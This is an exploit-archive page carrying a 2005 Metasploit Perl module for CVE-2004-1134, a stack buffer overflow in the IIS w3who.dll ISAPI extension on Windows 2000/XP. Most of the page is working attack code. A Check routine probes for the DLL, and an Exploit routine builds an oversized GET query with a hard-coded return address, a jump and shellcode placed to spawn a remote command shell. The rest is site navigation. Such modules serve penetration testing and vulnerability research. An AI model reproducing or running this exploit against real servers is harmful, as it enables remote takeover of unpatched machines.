iis_w3who_overflow.pm

iis_w3who_overflow.pm: Posted Jan 12, 2005; Authored by H D Moore | Site metasploit.com; Remote buffer overflow exploit for the w3who.dll in Microsoft Windows 2000. Drops to a command shell.; tags | exploit, remote, overflow, shell; systems | windows; advisories | CVE-2004-1134; SHA-256 | 791c811f7b49febb9fa1bb40a85b1ab1d9f1f2712120f52a797cf5c3770e9942; Download | Favorite | View

iis_w3who_overflow.pm


##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::iis_w3who_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
    'Name'  => 'IIS w3who.dll ISAPI Overflow',
    'Version'  => '$Revision: 1.2 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp' ],
    'Priv'  => 0,
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 80],
                    'URL'   => [1, 'DATA', 'The URL to the DLL', '/scripts/w3who.dll'],
                    'SSL'   => [0, 'BOOL', 'Use SSL'],
                },
    'AutoOpts' => { 'EXITFUNC' => 'process' },
    'Payload' => {
                 'Space'     => 632,
                 'BadChars'  => "\x00+&=%\x0a\x0d\x20",
                 'MinNops'   => 128,
                 },
    
    'Description'  => Pex::Text::Freeform(qq{
        This module exploits a stack overflow in the w3who.dll ISAPI application.
        This vulnerability was discovered Nicolas Gregoire and this code has been
        successfully tested against Windows 2000 and Windows XP (SP2). When 
        exploiting Windows XP, the payload must call RevertToSelf before it will
        be able to spawn a command shell.
    }),

    'Refs'  =>  [
                  ['CVE', '2004-1134'],
                    ['URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
                ],
    'DefaultTarget' => 0,
    'Targets' => [
                   ['Windows 2000 RESKIT DLL',   748,  0x10019f4a],  # pop, pop, ret magic
                 ],
    'Keys' => ['iis'],
};

sub new {
  my $class = shift;
  my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  return($self);
}

sub Check {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_path = $self->GetVar('URL');
    
    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $target_host, 
        'PeerPort'  => $target_port, 
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
      $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
      return $self->CheckCode('Connect');
    }

    $s->Send("GET $target_path HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");

    my $r = $s->Recv(-1, 5);

    if ($r =~ /Access Token/)
    {
        $self->PrintLine("[*] Found $target_path ;)");
        return $self->CheckCode('Detected');
    } else {
        
        $self->PrintLine("The w3who.dll ISAPI does not appear to be installed");
        return $self->CheckCode('Safe');
    }
}


sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_path = $self->GetVar('URL');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   =$self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];

    $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

    my $pattern = Pex::Text::EnglishText(8192);
    my $jmp = "\xe9".(pack('V', -641));    

    substr($pattern, $target->[1] - 4, 4, "\x90\x90\xeb\x04");
    substr($pattern, $target->[1]    , 4, pack('V', $target->[2]));
    substr($pattern, $target->[1] + 4, length($jmp), $jmp);  
    substr($pattern, $target->[1] - 4 - length($shellcode), length($shellcode), $shellcode);

    my $request =
    "GET $target_path?$pattern HTTP/1.1\r\n".
    "Host: $target_host:$target_port\r\n\r\n";

    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr'  => $target_host, 
        'PeerPort'  => $target_port, 
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
      $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
      return;
    }

    $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
    $s->Send($request);

    $self->PrintLine("[*] Waiting for a response...");
    my $r = $s->Recv(-1, 5);
    $s->Close();

    return;
}

1;

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

iis_w3who_overflow.pm

iis_w3who_overflow.pm

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

iis_w3who_overflow.pm

Share This

iis_w3who_overflow.pm

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems